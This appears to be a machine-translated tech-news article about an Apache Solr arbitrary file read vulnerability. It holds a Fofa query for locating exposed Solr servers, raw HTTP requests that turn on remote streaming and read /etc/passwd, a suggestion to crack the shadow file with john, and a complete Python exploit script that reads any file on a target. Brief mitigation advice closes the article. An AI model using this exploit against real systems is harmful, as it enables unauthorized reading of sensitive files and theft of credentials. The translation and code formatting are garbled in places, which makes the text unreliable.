Shulou(Shulou.com)05/31 Report--

This article mainly shows you the "web security Apache Solr full version of arbitrary file read vulnerability analysis", the content is easy to understand, well-organized, hope to help you solve your doubts, the following let the editor lead you to study and learn "web security Apache Solr full version of arbitrary file read vulnerability analysis" this article.

0x01 vulnerability description

There is an arbitrary file reading vulnerability in the full version of Apache Solr, which allows an attacker to obtain sensitive files of the target system without authorization.

0x02 affects version

Full version

Recurrence of 0x03 vulnerabilities

Fofa search title: app= "Solr" | | app= "" Apache-Solr "

Environment configuration

Download Solr to extract:

Https://solr.apache.org/downloads.html # solr download

Go to the bin directory of Solr and execute the command:

. / solr strat

When you visit url, the following page indicates that the startup is successful.

Http://192.168.153.7:8983

The solr launched at this time has no core for indexing and searching.

. / solr create-c # creates a core vulnerability recurrence of the data-driven mode

Visit url:

Http://192.168.153.7:8983/solr/admin/cores?indexInfo=false&wt=json

Burp packets are:

GET / solr/admin/cores?indexInfo=false&wt=json HTTP/1.1Host: 192.168.153.7:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

Then use burp to make POST requests:

POST / solr/henry/config HTTP/1.1Host: 192.168.153.7:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 84 {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": true}}

When "This response format is experimental. It is likely to change in the future." Indicates that there is a vulnerability.

To read the file:

POST / solr/henry/debug/dump?param=ContentStreams HTTP/1.1Host: 192.168.153.7:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 35Content-Type: application/x-www-form-urlencodedstream.url= file:///etc/passwd

You can also read the shadow file and john to burst the password:

POC script:

Master PeiQi, eternal God!

# coding=utf-8# Apache Solr full version arbitrary file read # Fofa:app= "Apache-Solr" | | app= "Solr" import requestsimport jsonimport sysimport timedef title (): print ("+ ~ +") print ("+ ~ Apache Solr full version arbitrary file read ~ +") print ("+ ~ ~ ~ Use: python3 solr.py ~ + ") print (" + ~ url: http://x.x.x.x:port ~ + ") print (" + ~ + ") time.sleep (2) def get_name (url): url_1 = url + "/ solr/admin/cores?indexInfo=false&wt=json" try: res = requests.get (url=url_1) # put the json data python dictionary words name = str (list (json.loads (res.text) ["status"]) [0]) print ("[!] Get the target system name:\ 033 [31m%s\ 033 [0m "% name+" [0] "+" URL: "+ url+" / solr/ "+ name+" / config ") return name except Exception as e: print (" [!]] The target URL cannot be exploited. " , e) sys.exit (0) def check_vul (url,name): url_2 = url + "/ solr/" + name + "/ config" data ='{"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": true}} 'try: res = requests.post (url=url_2) Data=data) if "This response format" in res.text and res.status_code = 200: print ("[!]\ 033 [31m target system vulnerability\ 033 [0m") else: print ("[!]] Target system does not have vulnerabilities ") sys.exit (0) except Exception as e: print (" [!]] Target system request failed ") sys.exit (0) def read_files (url,name,file_name): url = url +" / solr/ "+ name +" / debug/dump?param=ContentStreams "# content-type must be added here Otherwise, the file headers= {"Content-Type": "application/x-www-form-urlencoded"} data= "stream.url= file://{}".format(file_name) try: res = requests.post (url=url,headers=headers,data=data) if" No such file or directory "in res.text: print (" [!]] cannot be read. The target system failed to read the file!) Sys.exit (0) else: print ("reading file.") Content = (json.loads (res.text) ["streams"] [0] ["stream"]) print ("[o] reads the file as follows:\ n\ 033 [34m {}\ 033\ 0m" .format (content)) except Exception as e: print ("[!]] ", e) sys.exit (0) if _ _ name__ = =" _ _ main__ ": title () url = str (input ("\ n [!]) Enter the target system URL: ") name = get_name (url) check_vul (url,name) file_name = str (input (" [!]) Please enter the file to read: ") read_files (url,name,file_name) 0x04 repair proposal

As the official does not fix the vulnerability, there is no secure version for now.

1. Enable authentication / authorization

two。 Configure firewall policies to ensure that Solr API (including Admin UI) is accessible only to trusted IP and users

3. It is prohibited to place Apache Solr on the public network.

These are all the contents of this article entitled "Analysis of arbitrary File read vulnerabilities in the full version of Apache Solr in web Security". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.